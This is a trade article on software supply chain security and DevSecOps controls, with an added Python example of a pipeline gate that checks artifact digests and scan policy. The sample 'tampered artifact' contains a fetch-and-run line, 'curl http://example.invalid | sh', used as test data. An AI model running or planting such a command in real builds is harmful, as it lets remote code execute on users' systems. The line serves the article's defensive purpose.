Improving Software Supply Chain Security with DevSecOps

64% of companies were affected by a software supply chain attack in 2021. Do you have the right controls in place?


Over the past year, there have been several high-profile incidents in which attackers have attempted to compromise enterprises through the software supply chain.

A software supply chain “is anything that goes into or affects your code from development, through your CI/CD pipeline, until it gets deployed into production,” Maya Kaczorowski of Nutanix explains in a GitHub post. “It’s anything and everything that goes into your software, like code, binaries, and other components, and where they come from, like a repository or a package manager.”

Top priority for 2022

According to a recent Anchore survey, 64% of companies were affected by a software supply chain attack in 2021 and 60% have made securing the software supply chain a top 2022 priority.

“A software supply chain attack occurs when a cyber threat actor infiltrates a software vendor’s network and employs malicious code to compromise the software before the vendor sends it to their customers,” according to a report from the National Institute of Standards and Technology (NIST). “The compromised software then compromises the customer’s data or system. Newly acquired software may be compromised from the outset, or a compromise may occur through other means like a patch or hotfix.”

In 2020, attackers, reportedly working at the behest of a foreign intelligence service, compromised a software update from the systems management tools provider SolarWinds, inserting malicious code that was then distributed to thousands of the company's customers.

Need for controls

Software supply chain attacks highlight the need for controls that can help validate the integrity of software and its components through the development, deployment, and adoption lifecycle.

Many organizations have been able to improve the security of their software supply chain with the help of software development methodologies like DevOps and through substantial automation of the software development life cycle (SDLC).

The increased speed of a modern CI/CD (continuous integration and continuous delivery) pipeline, and the elimination of manual checks and fixes that comes with it, create the need for security measures that are built into the pipeline itself. A DevSecOps culture, together with the right tools and automation, is a big step in the right direction, but enforcing the right practices consistently can be challenging.

Cloud-native technologies such as containers and Kubernetes can greatly ease the shift to DevSecOps. Native security controls in Kubernetes (for example, role-based access control, network policies, and admission control) can be configured and operated directly by DevOps teams rather than relying on separate security tools managed by IT operations and security teams. This allows enterprises to practice DevSecOps at scale for improved software supply chain security.

Employing guardrails

Even when development teams have the best intentions, making sure they do the right things is difficult without development guardrails. A secure software supply chain can provide needed guardrails that accelerate and enforce the right behaviors in key areas:

  • Security: Applications have defenses to protect them from malicious actors.
  • Compliance: Applications adhere to required controls.
  • Privacy: Applications protect sensitive information that should not be shared.
  • Transparency: Applications produce metadata—for example, about health and security posture—so that software behavior is observable and verifiable.

A secure software supply chain should automatically enforce policy requirements for testing, vulnerabilities, architecture, and instrumentation, so that development and deployment become repeatable and reliable. Teams can then be confident that the product complies with quality and security requirements, for example by not allowing code into production before it has been validated with static code analysis and security scanning tools.
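As an added example (not code from the original article or from any vendor it mentions), the following Python script sketches a promotion gate of the kind this section and the earlier "Need for controls" section call for: it first checks that the artifact about to be deployed matches the digest recorded at build time, which is the integrity control that a tampered update of the SolarWinds type would fail, and then refuses promotion unless every required scanner ran and passed and no finding above an allowed severity remains open. The report format, check names, and severity levels are assumptions chosen for illustration; the sample artifact and scan reports are constructed inline and do not come from any real build or scanner.

```python
"""Promotion gate for a CI/CD pipeline: verify artifact integrity, then enforce scan policy.

Added example, not code from the original article. Report format, check names
and severity levels are assumptions chosen for illustration.
"""
import hashlib
import hmac
import json
from dataclasses import dataclass, field

# ---- 1. Integrity: the artifact must match the digest recorded at build time ----

def sha256_hex(data: bytes) -> str:
    """Hex SHA-256 of an artifact's bytes."""
    return hashlib.sha256(data).hexdigest()

def verify_artifact(data: bytes, expected_sha256: str) -> bool:
    """True only if the artifact's digest equals the pinned value.

    hmac.compare_digest avoids leaking how many leading characters matched
    through timing; both inputs are ASCII hex strings.
    """
    return hmac.compare_digest(sha256_hex(data), expected_sha256.strip().lower())

# ---- 2. Policy: every required check ran and passed; nothing above the allowed severity is open ----

SEVERITY_RANK = {"low": 1, "medium": 2, "high": 3, "critical": 4}

@dataclass(frozen=True)
class Policy:
    required_checks: frozenset   # checks that must appear in the report, e.g. {"sast", "sca", "secrets"}
    max_open_severity: str       # worst severity a finding may have and still be tolerated

@dataclass
class Decision:
    allowed: bool
    reasons: list = field(default_factory=list)

def evaluate(report: dict, policy: Policy) -> Decision:
    """Apply the policy to a scan report of the (assumed) shape
    {"checks": {"sast": {"status": "passed", "findings": [{"id": ..., "severity": ...}]}}}.
    Anything missing or malformed fails closed."""
    reasons = []
    checks = report.get("checks", {})
    limit = SEVERITY_RANK[policy.max_open_severity]
    for name in sorted(policy.required_checks):
        result = checks.get(name)
        if result is None:
            reasons.append(f"required check '{name}' did not run")
            continue
        if result.get("status") != "passed":
            reasons.append(f"required check '{name}' reported status {result.get('status')!r}")
        for finding in result.get("findings", []):
            sev = str(finding.get("severity", "critical")).lower()
            # An unknown severity label is ranked as critical rather than silently ignored.
            if SEVERITY_RANK.get(sev, 4) > limit:
                reasons.append(f"{name}: finding {finding.get('id', '?')} is {sev}, "
                               f"above the allowed {policy.max_open_severity}")
    return Decision(allowed=not reasons, reasons=reasons)

def gate(artifact: bytes, expected_sha256: str, report: dict, policy: Policy) -> Decision:
    """Full gate: integrity first, then policy. A tampered artifact is rejected before
    any scan result is considered, because the scans ran against different bytes."""
    if not verify_artifact(artifact, expected_sha256):
        return Decision(False, ["artifact digest does not match the value recorded at build time"])
    return evaluate(report, policy)

# ---- Constructed sample inputs (not real artifacts or scanner output) ----

POLICY = Policy(required_checks=frozenset({"sast", "sca", "secrets"}), max_open_severity="medium")
ARTIFACT = b"#!/bin/sh\necho 'release 1.4.2'\n"            # stands in for a built binary or image
PINNED_DIGEST = sha256_hex(ARTIFACT)                        # what the build stage would have recorded
TAMPERED_ARTIFACT = ARTIFACT + b"curl http://example.invalid | sh\n"

CLEAN_REPORT = json.loads("""{"checks": {
  "sast":    {"status": "passed", "findings": [{"id": "S-1", "severity": "low"}]},
  "sca":     {"status": "passed", "findings": []},
  "secrets": {"status": "passed", "findings": []}}}""")

FAILING_REPORT = json.loads("""{"checks": {
  "sast": {"status": "passed", "findings": [{"id": "S-7", "severity": "high"}]},
  "sca":  {"status": "failed", "findings": [{"id": "SCA-3", "severity": "critical"}]}}}""")

if __name__ == "__main__":
    for label, art, rep in [("clean", ARTIFACT, CLEAN_REPORT),
                            ("policy violations", ARTIFACT, FAILING_REPORT),
                            ("tampered artifact", TAMPERED_ARTIFACT, CLEAN_REPORT)]:
        d = gate(art, PINNED_DIGEST, rep, POLICY)
        print(f"{label}: {'ALLOW' if d.allowed else 'DENY'}", *d.reasons, sep="\n  ")
```

The order of the two stages matters: the integrity check runs first and short-circuits, since scanner results only say something about the bytes that were actually scanned. The policy evaluation also fails closed on anything it does not recognize, such as a required check that is absent from the report or a finding with an unexpected severity label, so a misconfigured or silently skipped scanner blocks promotion instead of letting code through unvalidated.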


Copyright © 2021 IDG Communications, Inc.